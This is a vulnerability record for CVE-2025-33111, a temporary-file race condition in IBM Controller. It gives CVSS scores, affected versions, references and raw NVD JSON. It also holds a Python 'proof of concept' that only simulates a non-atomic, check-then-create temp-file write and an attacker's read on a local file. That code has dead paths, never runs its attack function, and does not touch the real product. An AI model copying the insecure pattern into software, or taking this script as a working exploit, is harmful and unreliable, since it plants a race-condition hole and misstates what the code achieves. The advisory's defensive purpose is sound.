CVE-2025-33111

Description

IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 is vulnerable to creation of temporary files without atomic operations which may expose sensitive information to an authenticated user due to race condition attacks.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:* - VULNERABLE

IBM Controller 11.1.0

IBM Controller 11.1.1

IBM Cognos Controller 11.0.0

IBM Cognos Controller 11.0.1

IBM Cognos Controller 11.0.1 FP6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-33111 PoC - IBM Controller Temporary File Race Condition
Note: This is a conceptual demonstration, actual exploitation requires specific conditions.
"""

import os
import time
import threading
import tempfile

def simulate_vulnerable_temp_file_creation():
    """
    Simulate the vulnerable temporary file creation pattern found in IBM Controller.
    The vulnerability exists when files are created without atomic operations.
    """
    print("[*] Simulating vulnerable temporary file creation...")
    
    # Vulnerable pattern: Check existence before creation (TOCTOU)
    temp_path = "/tmp/ibm_controller_temp_file.txt"
    
    # Race condition window starts here
    if not os.path.exists(temp_path):
        # Window of opportunity for race condition
        time.sleep(0.001)  # Simulating processing delay
        
        try:
            # Creating file without O_EXCL flag (non-atomic)
            with open(temp_path, 'w') as f:
                f.write("Sensitive data - Controller config")
            print(f"[+] File created at: {temp_path}")
            return temp_path
        except FileExistsError:
            print("[-] Race condition detected: File already exists")
            return None
    
    return None

def race_condition_attack(target_path):
    """
    Simulate attacker exploiting the race condition window.
    In real scenario, attacker would create symlink or replace file content.
    """
    print(f"[*] Attacker attempting to exploit race condition at {target_path}")
    
    # In real attack: Create symlink or inject malicious content
    # This demonstrates the concept only
    if os.path.exists(target_path):
        try:
            # Attempt to read potentially exposed sensitive data
            with open(target_path, 'r') as f:
                content = f.read()
                print(f"[!] Potential sensitive data exposed: {content[:50]}...")
                return True
        except PermissionError:
            print("[-] Permission denied - attack may still succeed with symlink")
    return False

def main():
    print("=" * 60)
    print("CVE-2025-33111 - IBM Controller Race Condition PoC")
    print("=" * 60)
    
    # Simulate vulnerable application behavior
    temp_file = simulate_vulnerable_temp_file_creation()
    
    if temp_file:
        # Clean up for demo
        if os.path.exists(temp_file):
            os.remove(temp_file)
    
    print("\n[*] Note: This PoC demonstrates the vulnerability concept.")
    print("[*] Actual exploitation requires authenticated access to IBM Controller.")
    print("[*] Mitigations:")
    print("    1. Use atomic file operations (mkstemp, O_EXCL)")
    print("    2. Set restrictive file permissions")
    print("    3. Apply IBM security patches")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-33111
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-33111
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-33111/
[4] VulDB https://vuldb.com/cve/CVE-2025-33111
[5] https://www.ibm.com/support/pages/node/7253273

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-33111", "sourceIdentifier": "[email protected]", "published": "2025-12-08T22:15:51.150", "lastModified": "2025-12-10T18:13:59.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 is vulnerable to creation of temporary files without atomic operations which may expose sensitive information to an authenticated user due to race condition attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-379"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.1.7", "matchCriteriaId": "010915B1-A0E9-4D01-8A86-3B771F2AD659"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.2", "matchCriteriaId": "24C24CEC-8494-4620-9F14-22D154D85866"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7253273", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}